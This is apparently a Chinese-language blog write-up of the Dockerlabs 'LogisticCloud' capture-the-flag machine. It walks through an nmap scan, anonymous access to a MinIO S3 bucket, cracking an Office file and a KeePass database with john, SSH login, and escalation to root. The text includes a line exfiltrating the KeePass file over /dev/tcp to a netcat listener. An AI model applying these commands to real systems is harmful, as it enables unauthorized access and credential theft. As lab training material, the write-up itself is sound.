跳过正文
HYH’s Blog

Dockerlabs-LogisticCloud

·890 字·5 分钟
Dockerlabs Dockerlabs Linux
HYH
作者
HYH
一名专注于网络安全、渗透测试与 CTF 挑战的技术爱好者,热衷于记录实战经验、分享工具与技术,致力于持续学习与成长。
目录

Nmap
# 

[root@kali] /home/kali/LogisticCloud  
❯ nmap 172.17.0.2 -sV -A -p-                                                                                                                  ⏎
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-29 22:07 EDT
Nmap scan report for 172.17.0.2
Host is up (0.00011s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e9:59:86:db:ea:af:ff:09:ee:8f:ab:c6:0d:b8:b5:82 (ECDSA)
|_  256 ff:8d:9f:f8:e7:a5:f4:ce:6a:2d:e4:30:ac:77:18:fc (ED25519)
80/tcp   open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Login - HLG Logistics
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
9000/tcp open  http    Golang net/http server
|_http-title: Site doesn't have a title (application/xml).
|_http-server-header: MinIO
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 400 Bad Request
|     Accept-Ranges: bytes
|     Content-Length: 303
|     Content-Type: application/xml
|     Server: MinIO
|     Strict-Transport-Security: max-age=31536000; includeSubDomains
|     Vary: Origin
|     X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
|     X-Amz-Request-Id: 18442BF4BCD11059
|     X-Content-Type-Options: nosniff
|     X-Xss-Protection: 1; mode=block
|     Date: Fri, 30 May 2025 02:08:05 GMT
|     <?xml version="1.0" encoding="UTF-8"?>
|     <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/nice ports,/Trinity.txt.bak</Resource><RequestId>18442BF4BCD11059</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>
|   GenericLines, Help, RTSPRequest, SSLSessionReq: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 400 Bad Request
|     Accept-Ranges: bytes
|     Content-Length: 276
|     Content-Type: application/xml
|     Server: MinIO
|     Strict-Transport-Security: max-age=31536000; includeSubDomains
|     Vary: Origin
|     X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
|     X-Amz-Request-Id: 18442BF13C1B8666
|     X-Content-Type-Options: nosniff
|     X-Xss-Protection: 1; mode=block
|     Date: Fri, 30 May 2025 02:07:50 GMT
|     <?xml version="1.0" encoding="UTF-8"?>
|     <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/</Resource><RequestId>18442BF13C1B8666</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Vary: Origin
|     Date: Fri, 30 May 2025 02:07:50 GMT
|_    Content-Length: 0
9001/tcp open  http    Golang net/http server
|_http-server-header: MinIO Console
|_http-title: MinIO Console
| fingerprint-strings: 
|   GenericLines, SSLSessionReq: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest, HTTPOptions: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Content-Length: 1309
|     Content-Security-Policy: default-src 'self' 'unsafe-eval' 'unsafe-inline'; script-src 'self' https://unpkg.com; connect-src 'self' https://unpkg.com;
|     Content-Type: text/html
|     Last-Modified: Fri, 30 May 2025 02:07:50 GMT
|     Referrer-Policy: strict-origin-when-cross-origin
|     Server: MinIO Console
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: DENY
|     X-Xss-Protection: 1; mode=block
|     Date: Fri, 30 May 2025 02:07:50 GMT
|_    <!doctype html><html lang="en"><head><meta charset="utf-8"/><base href="/"/><meta content="width=device-width,initial-scale=1" name="viewport"/><meta content="#081C42" media="(prefers-color-scheme: light)" name="theme-color"/><meta content="#081C42" media="(prefers-color-scheme: dark)" name="theme-color"/><meta content="MinIO Console" name="description"/><meta name="minio-license" content="agpl"/><link href="./s

AWS
#

进入80端口可以找到一个登录框,尝试爆破登陆失败,查看一下网页源码,发现了一个特殊的值huguelogistics-data,并且namebucket

<div class="container">
    <h2>HLG Logistics - Ingreso</h2>
        <form method="post" action="index.php">
        <label>Usuario:</label>
	<input hidden="huguelogistics-data" name="bucket">
        <input type="text" name="username" required>
        <label>Contraseña:</label>
        <input type="password" name="password" required>
        <input type="submit" value="Entrar al sistema">
    </form>
</div>

Amazon S3(Simple Storage Service)是 AWS 提供的对象存储服务,常用于存储静态文件、备份数据、网站托管等。S3 中的存储单元叫 Bucket(桶)

python -m pip install awscli  # if you don't have aws

尝试使用aws-cli来匿名访问这个存储桶

[root@kali] /home/kali/LogisticCloud  
❯ aws s3 ls --no-sign-request --endpoint-url http://172.17.0.2:9000 s3://huguelogistics-data                                                  ⏎

2025-05-08 09:54:45      15360 backup.xlsx

将其下载

[root@kali] /home/kali/LogisticCloud  
❯ aws s3 cp s3://huguelogistics-data/backup.xlsx ./ --no-sign-request --endpoint-url http://172.17.0.2:9000

download: s3://huguelogistics-data/backup.xlsx to ./backup.xlsx

打开显示需要密码

image-20250530102958101

使用office2john来爆破

[root@kali] /home/kali/LogisticCloud  
❯ office2john backup.xlsx > hash.txt

[root@kali] /home/kali/LogisticCloud  
❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 128/128 AVX 4x / SHA512 128/128 AVX 2x AES])
Cost 1 (MS Office version) is 2007 for all loaded hashes
Cost 2 (iteration count) is 50000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password88       (backup.xlsx)     
1g 0:00:00:05 DONE (2025-05-29 22:30) 0.1996g/s 3404p/s 3404c/s 3404C/s princez..mia305
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

经过尝试,存在可登录用户

username: prudencia.de.ferrera
password: )4UJM)JGab

进入后台找到ssh登录用户

image-20250530103350540 

[root@kali] /home/kali/LogisticCloud  
❯ ssh prudencia-de-ferrera@172.17.0.2                   
The authenticity of host '172.17.0.2 (172.17.0.2)' can't be established.
ED25519 key fingerprint is SHA256:aUh1nVmGRC1uE7L4pGwk3WeWFmXrz0RwJpcawSJO8rA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.17.0.2' (ED25519) to the list of known hosts.
prudencia-de-ferrera@172.17.0.2's password: 
Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.12.13-amd64 x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

prudencia-de-ferrera@7fb26a28ed69:~$ ls
user.txt
prudencia-de-ferrera@7fb26a28ed69:~$ cat user.txt 
a303ce44f50628e5511aca3538d11f3e

Root
#

经过枚举找到一个 KeePass 密码数据库文件

image-20250530103843593 

[root@kali] /home/kali/Desktop  
❯ nc -lnvp 6666 > credentialsDatabase.kdb
listening on [any] 6666 ...
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.2] 39802

prudencia-de-ferrera@7fb26a28ed69:~$ cat /etc/keepass/credentialsDatabase.kdb > /dev/tcp/172.17.0.1/6666

使用keepass2john来爆破

[root@kali] /home/kali/LogisticCloud  
❯ john keepass.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 600000 for all loaded hashes
Cost 2 (version) is 1 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:14 0.00% (ETA: 2025-06-03 02:04) 0g/s 47.29p/s 47.29c/s 47.29C/s batista..nichole
0g 0:00:00:15 0.00% (ETA: 2025-06-03 00:28) 0g/s 47.73p/s 47.73c/s 47.73C/s lonely..james1
0g 0:00:00:20 0.01% (ETA: 2025-06-03 00:10) 0g/s 49.35p/s 49.35c/s 49.35C/s andre..bethany
0g 0:00:02:20 0.04% (ETA: 2025-06-02 21:34) 0g/s 50.79p/s 50.79c/s 50.79C/s clever..emoemo
EMINEM           (credentialsDatabase.kdb)     
1g 0:00:02:37 DONE (2025-05-29 22:45) 0.006363g/s 50.49p/s 50.49c/s 50.49C/s jeannette..melania
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

image-20250530105137895

查看到pablo的密码,刚好可以用于root登录

prudencia-de-ferrera@7fb26a28ed69:~$ su root
Password: 
root@7fb26a28ed69:/home/prudencia-de-ferrera# id
uid=0(root) gid=0(root) groups=0(root)
root@7fb26a28ed69:/home/prudencia-de-ferrera# cat /root/root.txt 
16ceffb6b5f596855037e8ab1718b75f
root@7fb26a28ed69:/home/prudencia-de-ferrera#
Reply by Email